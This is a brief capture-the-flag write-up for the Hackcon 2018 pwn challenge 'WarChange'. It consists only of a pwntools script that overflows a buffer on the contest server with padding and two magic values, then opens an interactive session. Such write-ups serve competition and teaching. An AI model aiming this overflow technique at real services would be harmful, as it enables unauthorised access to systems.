Rating:

# WarChange
**Category**: pwn
**Points**: 70

# Write-Up
```python
from pwn import *

p = remote('139.59.30.165',8800)
payload = "A"*72
payload += p32(0xcafebabe)
payload += p32(0xdeadbeef)
payload += "A"*50
p.sendline(payload)
p.interactive()
```

Original writeup (https://github.com/Ascope-Team/write-ups-2018/tree/master/Hackcon-2018/WarChange_pwn_70).